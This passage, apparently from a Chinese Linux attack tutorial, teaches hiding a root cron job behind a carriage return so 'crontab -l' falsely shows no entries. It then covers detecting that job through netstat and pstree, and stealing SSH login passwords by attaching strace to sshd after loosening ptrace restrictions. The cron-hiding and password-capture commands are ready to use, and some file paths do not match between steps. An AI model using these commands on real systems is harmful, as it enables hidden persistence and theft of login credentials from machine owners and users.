cd /home/miao
root@ubuntu-lab:/home/miao# pwd
pwd
/home/miao

    隱藏的命令實踐如下:

    root@ubuntu-lab:/home/miao# crontab -l
no crontab for root
root@ubuntu-lab:/home/miao# (crontab -l;printf "* * * * * /home/miao/1.sh;\rno crontab for `whoami`%100c\n")|crontab -
no crontab for root
root@ubuntu-lab:/home/miao# cat /var/spool/cron/crontabs/root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Sun Jul 24 05:28:19 2022)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
no crontab for root                                                                                                   
root@ubuntu-lab:/home/miao# cat -A /var/spool/cron/crontabs/root
# DO NOT EDIT THIS FILE - edit the master and reinstall.$
# (- installed on Sun Jul 24 05:28:19 2022)$
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)$
* * * * * /home/miaohq/1.sh;^Mno crontab for root

    注意這個"%100c\n" 加了%100c即要保證回車后面的字符超過100個,換行也是模仿crontab -l的效果,如果不加%100c,回車后面的字符就從開頭開始輸出,會導致后面跟著前面的一些字符信息,如下:

    root@ubuntu-lab:/home/miao# printf  "* * * * * /home/miao/1.sh;\rno crontab for `whoami` \n"
no crontab for root /1.sh;

    到此結束。

    2.3 如何檢測

    檢測比較簡單,首先用netstat 查看連接信息的進程,然后通過進程的關系查找這個進程由哪個啟動的,如下:

    root@ubuntu-lab:/home/miao# netstat -antp|grep 1111
tcp        1      0 0.0.0.0:1111            0.0.0.0:*               LISTEN      1786/nc             
tcp        0      0 127.0.0.1:57386         127.0.0.1:1111          ESTABLISHED 1803/bash           
tcp        0      0 127.0.0.1:57390         127.0.0.1:1111          ESTABLISHED 1870/bash           
tcp        0      0 127.0.0.1:1111          127.0.0.1:57386         ESTABLISHED 1786/nc             
tcp      133      0 127.0.0.1:1111          127.0.0.1:57390         ESTABLISHED -   

root@ubuntu-lab:/home/miao# pstree -p|grep 1803
           |-cron(1013)-+-cron(1798)---sh(1799)---1.sh(1800)---bash(1802)---bash(1803)
root@ubuntu-lab:/home/miao# 
root@ubuntu-lab:/home/miao# 
root@ubuntu-lab:/home/miao# ps -ef|grep 1013
root        1013       1  0 05:48 ?        00:00:00 /usr/sbin/cron -f -P
root        1798    1013  0 05:51 ?        00:00:00 /usr/sbin/CRON -f -P
root        1865    1013  0 05:52 ?        00:00:00 /usr/sbin/CRON -f -P
root        1913    1013  0 05:53 ?        00:00:00 /usr/sbin/CRON -f -P
root        1962    1817  0 05:53 pts/0    00:00:00 grep --color=auto 1013
root@ubuntu-lab:/home/miao# ps -ef|grep 1798
root        1798    1013  0 05:51 ?        00:00:00 /usr/sbin/CRON -f -P
root        1799    1798  0 05:51 ?        00:00:00 /bin/sh -c /home/miao/1.sh;?no crontab for root                                                                                                   
root        1973    1817  0 05:54 pts/0    00:00:00 grep --color=auto 1798

    很簡單,我們看到CRON啟動了shell腳本:/bin/sh -c /home/miao/1.sh;?no crontab for root

    三 strace 跟蹤shell輸入的密碼

    原理很簡單,strace 可以跟蹤應用程序的系統應用,并且可以獲取應用程序的參數,那么就可以跟蹤登錄的sshd程序,將密碼獲取到。 腳本比較簡單:

     (strace -f -F -p `ps aux|grep "/usr/sbin/sshd"|grep -v grep|awk {'print $2'}`  -e trace=read,write -s 32 2> /tmp/.ssh &)

    如果報沒有權限,改下:

     /etc/sysctl.d/10-ptrace.conf
中:kernel.yama.ptrace_scope為0
后執行:sysctl -p

    然后通過命令搜索:

    grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

    即可以獲取密碼。

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有